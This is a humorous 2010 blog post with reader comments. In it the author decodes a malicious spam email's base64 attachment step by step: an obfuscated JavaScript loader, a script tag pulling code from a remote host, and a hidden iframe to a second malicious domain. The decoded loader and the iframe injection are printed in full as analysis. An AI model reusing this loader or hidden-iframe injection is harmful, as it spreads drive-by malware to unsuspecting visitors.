?

Log in

No account? Create an account

Previous Entry | Next Entry

I Go In, the Crime Begins...

Ten years ago, spam was so painfully obvious that 1/2 second's thought could differentiate it from real email:

DEAR SIR IN CHRIST,
I AM BARR. PONDO. I KNOW YOURESURPRISED TO HEAR FROM ME,I WAS REFERRED....


Then it got slightly more sophisticated:

Dear Subscriber,

Recently, we have had to change all the passwords on your email system....


But today's was even fun. It makes me want to consider taking the story from here to wherever it may go:


Here is the P/O for the van renting in Paris that has been used for the costumes. As I told you, my colleague Francois-Xavier paid for it with his own money. Can I proceed to his reimbursment through the French check book? Thanks for letting me know soon.


It has all the televised marks of a con: It appeals to your greed, it gets you to invest in a false outcome, and it leaves you with a discretely obfuscated package of no value:

PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZh
c2NyaXB0Ij4NCnZhciBpLHkseD0iMjAyMDIwMjAzYzczNjM3MjY5NzA3NDIw
NzM3MjYzM2QyMjY4NzQ3NDcwM2EyZjJmNjQ2ZjY3NjE3MjZkNjMyZTYzNmY2
ZDJmNjk2NjcyNjE2ZDY1NjY2OTZjNjUyZTZhNzMyMjNlM2MyZjczNjM3MjY5
NzA3NDNlMjAiO3k9Jyc7Zm9yKGk9MDtpPHgubGVuZ3RoO2krPTIpe3krPXVu
ZXNjYXBlKCclJyt4LnN1YnN0cihpLDIpKTt9ZG9jdW1lbnQud3JpdGUoeSk7
DQo8L3NjcmlwdD4=


Which when decoded base-64, reveals a javascript snippet:

<script language="JavaScript" type="text/javascript">

var i,y,x="202020203c736372697074207372633d22687474703a2f2f646f6761726d632e636f6d2f696672616d6566696c652e6a73223e3c2f7363726970743e20";y='';for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);

</script>


Which, in turn, decodes the long number from hex values to ASCII and writes them to the document, opening an iframe:

<script src="http://dogarmc.com/iframefile.js"></script>

Which, when downloaded, has an unobfusticated javascript, that opens another iframe:

document.write("<iframe src='http://lapivyg.co.cc/wiki/index.php?table=img&past=0&p=168&version=boz&pool=off' width='1' height='1' style='visibility: hidden;'></iframe>");

THAT iframe, when checked gives me a 302 error and sends me to Google's 404 page (here are the headers):


HTTP/1.1 302 Moved Temporarily
< Server: nginx/0.6.32
< Date: Wed, 22 Sep 2010 12:37:24 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: close
< X-Powered-By: PHP/5.2.6-1+lenny4.fpm.4
< Set-Cookie: xyz=1285159044; expires=Wed, 29-Sep-2010 12:37:24 GMT; path=/; domain=lapivyg.co.cc
< Location: http://www.google.com/404/


I'm assuming what it does (besides setting a cookie) is look for a specific type of browser and, assuming it finds the insecure beast, delivers it, instead, the malware payload it is designed to breech.

So, ho-hum. Just another spambot infector.

But what a brave new world to have such mechanisms in it. And I can't stop thinking about that PO box in Paris, and what sort of costumes they may be.

Wait! There's someone at the door. Could it be François Xavier? I'll go see....

EDIT: Jehovah's Witness. Now I'm truly let down...

Comments

( 4 comments — Leave a comment )
tryslora
Sep. 22nd, 2010 10:59 am (UTC)
Sounds like the spam we've been getting bombarded with here... everything from random invoices to queries about family weekends (which got two of our machines because family weekend is coming up as an event in three weeks and we are producing several parts of it *sighs*).
barry_king
Sep. 22nd, 2010 05:31 pm (UTC)
Ah, the lovely, lovely grind of IT.
acwise
Sep. 22nd, 2010 10:03 pm (UTC)
I have a mental image of someone in a gorilla suit, accompanied by someone in a ballerina outfit, driving up in a nondescript van, and demanding a check book.
barry_king
Sep. 23rd, 2010 06:59 am (UTC)
I was thinking Commedia Dell'arte, with all the swooshy big noses, but now you've got me humming out of the Cabaret song book.

Oh, no, wait. That's a gorilla IN a ballerina outfit.
( 4 comments — Leave a comment )